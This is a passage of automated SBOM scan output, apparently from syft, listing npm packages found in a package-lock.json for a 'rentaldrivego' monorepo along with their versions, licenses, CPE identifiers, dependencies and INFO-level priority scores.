reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 97286ac4a749af60 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/stylesheet 6.2.1' + title: '@react-pdf/stylesheet 6.2.1' + description: 'Package discovered: @react-pdf/stylesheet 6.2.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ff4544477cbe31d7 + name: '@react-pdf/stylesheet' + version: 6.2.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/stylesheet:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/stylesheet:6.2.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/stylesheet@6.2.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz + integrity: sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A== + dependencies: + '@react-pdf/fns': 3.1.3 + '@react-pdf/types': ^2.11.1 + color-string: ^2.1.4 + hsl-to-hex: ^1.0.0 + media-engine: ^1.0.3 + postcss-value-parser: ^4.1.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: aac5b1fed64c15db + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/textkit 4.4.1' + title: '@react-pdf/textkit 4.4.1' + description: 'Package discovered: @react-pdf/textkit 4.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9a502dcbe994e863 + name: '@react-pdf/textkit' + version: 4.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/textkit:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/textkit:4.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/textkit@4.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz + integrity: sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ== + dependencies: + '@babel/runtime': ^7.20.13 + '@react-pdf/fns': 2.2.1 + bidi-js: ^1.0.2 + hyphen: ^1.6.4 + unicode-properties: ^1.4.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d6967341a8bbb112 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @react-pdf/types 2.11.1' + title: '@react-pdf/types 2.11.1' + description: 'Package discovered: @react-pdf/types 2.11.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 3103913e34f4201d + name: '@react-pdf/types' + version: 2.11.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@react-pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react-pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/types:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react_pdf\/types:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react-pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@react:\@react_pdf\/types:2.11.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40react-pdf/types@2.11.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@react-pdf/types/-/types-2.11.1.tgz + integrity: sha512-i9xQgfaDU9QoeNnbp6rltXCWg1huEh195rpOuN8cE4BZ2FuLdQrsIcb2dhFF9aOxXf+XBA6LOSpIW051MDD/bw== + dependencies: + '@react-pdf/font': ^4.0.8 + '@react-pdf/primitives': ^4.3.0 + '@react-pdf/stylesheet': ^6.2.1 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f5a58400fb5d806d + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/admin 1.0.0' + title: '@rentaldrivego/admin 1.0.0' + description: 'Package discovered: @rentaldrivego/admin 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2a2c690594e77e74 + name: '@rentaldrivego/admin' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/admin@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@rentaldrivego/types': '*' + autoprefixer: ^10.4.19 + dayjs: ^1.11.11 + lucide-react: ^0.376.0 + next: 14.2.3 + postcss: ^8.4.38 + react: ^18.3.1 + react-dom: ^18.3.1 + recharts: ^2.12.7 + tailwindcss: ^3.4.3 + zod: ^3.23.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b0c291ec8410a1be + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/admin UNKNOWN' + title: '@rentaldrivego/admin UNKNOWN' + description: 'Package discovered: @rentaldrivego/admin UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 22655bafcebdfea4 + name: '@rentaldrivego/admin' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/admin:\@rentaldrivego\/admin:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/admin + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: apps/admin + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 28e1ac461cbd16df + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/api 1.0.0' + title: '@rentaldrivego/api 1.0.0' + description: 'Package discovered: @rentaldrivego/api 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 51dda2f8a6d52783 + name: '@rentaldrivego/api' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/api@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@react-pdf/renderer': ^3.4.3 + '@rentaldrivego/database': '*' + '@rentaldrivego/types': '*' + bcryptjs: ^2.4.3 + cors: ^2.8.5 + dayjs: ^1.11.11 + express: ^4.19.2 + express-rate-limit: ^8.5.1 + firebase-admin: ^12.1.0 + helmet: ^7.1.0 + ioredis: ^5.3.2 + jsonwebtoken: ^9.0.2 + morgan: ^1.10.0 + multer: ^1.4.5-lts.1 + node-cron: ^3.0.3 + nodemailer: ^6.9.16 + otplib: ^12.0.1 + qrcode: ^1.5.3 + react: ^18.3.1 + react-dom: ^18.3.1 + resend: ^3.2.0 + socket.io: ^4.7.5 + twilio: ^5.1.0 + zod: ^3.23.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8fa1f2444979ec05 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/api UNKNOWN' + title: '@rentaldrivego/api UNKNOWN' + description: 'Package discovered: @rentaldrivego/api UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 731fc15901c69a78 + name: '@rentaldrivego/api' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/api:\@rentaldrivego\/api:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/api + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: apps/api + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 5e204c38947c3756 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/dashboard 1.0.0' + title: '@rentaldrivego/dashboard 1.0.0' + description: 'Package discovered: @rentaldrivego/dashboard 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: fb550e5d7052cd7e + name: '@rentaldrivego/dashboard' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/dashboard@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@rentaldrivego/types': '*' + autoprefixer: ^10.4.19 + dayjs: ^1.11.11 + lucide-react: ^0.376.0 + next: 14.2.3 + postcss: ^8.4.38 + react: ^18.3.1 + react-dom: ^18.3.1 + recharts: ^2.12.7 + sharp: ^0.34.5 + socket.io-client: ^4.7.5 + tailwindcss: ^3.4.3 + zod: ^3.23.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f5ec61dae5249a19 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/dashboard UNKNOWN' + title: '@rentaldrivego/dashboard UNKNOWN' + description: 'Package discovered: @rentaldrivego/dashboard UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8302af283dd2fb59 + name: '@rentaldrivego/dashboard' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/dashboard:\@rentaldrivego\/dashboard:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/dashboard + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: apps/dashboard + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 71d8c650760061fb + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/database 1.0.0' + title: '@rentaldrivego/database 1.0.0' + description: 'Package discovered: @rentaldrivego/database 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: bd8906fc40f841ac + name: '@rentaldrivego/database' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/database@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@prisma/client': ^5.13.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8b90575e8ea88bd4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/database UNKNOWN' + title: '@rentaldrivego/database UNKNOWN' + description: 'Package discovered: @rentaldrivego/database UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 2bdca263d566c09a + name: '@rentaldrivego/database' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/database:\@rentaldrivego\/database:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/database + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: packages/database + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8a8bb5bfb12506b1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/marketplace 1.0.0' + title: '@rentaldrivego/marketplace 1.0.0' + description: 'Package discovered: @rentaldrivego/marketplace 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 71e9d3c366707710 + name: '@rentaldrivego/marketplace' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/marketplace@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@rentaldrivego/types': '*' + autoprefixer: ^10.4.19 + dayjs: ^1.11.11 + lucide-react: ^0.376.0 + next: 14.2.3 + postcss: ^8.4.38 + react: ^18.3.1 + react-dom: ^18.3.1 + tailwindcss: ^3.4.3 + zod: ^3.23.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f48ad70ae4557b5a + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/marketplace UNKNOWN' + title: '@rentaldrivego/marketplace UNKNOWN' + description: 'Package discovered: @rentaldrivego/marketplace UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 999e66650845f9f4 + name: '@rentaldrivego/marketplace' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/marketplace:\@rentaldrivego\/marketplace:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/marketplace + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: apps/marketplace + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 93a5bccb6ac6aa22 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/public-site 1.0.0' + title: '@rentaldrivego/public-site 1.0.0' + description: 'Package discovered: @rentaldrivego/public-site 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f54f88caa8e97b5c + name: '@rentaldrivego/public-site' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@rentaldrivego\/public-site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@rentaldrivego\/public_site:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public-site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@rentaldrivego\/public:\@rentaldrivego\/public_site:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/public-site@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: + '@rentaldrivego/types': '*' + autoprefixer: ^10.4.19 + dayjs: ^1.11.11 + lucide-react: ^0.376.0 + next: 14.2.3 + postcss: ^8.4.38 + react: ^18.3.1 + react-dom: ^18.3.1 + tailwindcss: ^3.4.3 + zod: ^3.23.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 308a85ace6addbbf + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/types 1.0.0' + title: '@rentaldrivego/types 1.0.0' + description: 'Package discovered: @rentaldrivego/types 1.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ba9eab15fb9d9b6f + name: '@rentaldrivego/types' + version: 1.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:1.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/types@1.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: '' + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 7f447d2356272ad6 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @rentaldrivego/types UNKNOWN' + title: '@rentaldrivego/types UNKNOWN' + description: 'Package discovered: @rentaldrivego/types UNKNOWN' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f26df386702211f3 + name: '@rentaldrivego/types' + version: UNKNOWN + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:\@rentaldrivego\/types:\@rentaldrivego\/types:*:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40rentaldrivego/types + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: packages/types + integrity: '' + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 4b6c5d98db4a925c + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0' + title: '@selderee/plugin-htmlparser2 0.11.0' + description: 'Package discovered: @selderee/plugin-htmlparser2 0.11.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 264d7bf353437253 + name: '@selderee/plugin-htmlparser2' + version: 0.11.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@selderee\/plugin-htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@selderee\/plugin_htmlparser2:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin-htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:\@selderee\/plugin:\@selderee\/plugin_htmlparser2:0.11.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/%40selderee/plugin-htmlparser2@0.11.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/@selderee/plugin-htmlparser2/-/plugin-htmlparser2-0.11.0.tgz + integrity: sha512-P33hHGdldxGabLFjPPpaTxVolMrzrcegejx+0GxjrIb9Zv48D8yAIA/QTDR2dFl7Uz7urX8aX6+5bCZslr+gWQ== + dependencies: + domhandler: ^5.0.3 + selderee: ^0.11.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 96b2d8a0d3d3dca0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: @socket.io/component-emitter 3.1.2' + title: '@socket.io/component-emitter 3.1.2' + description: 'Package discovered: 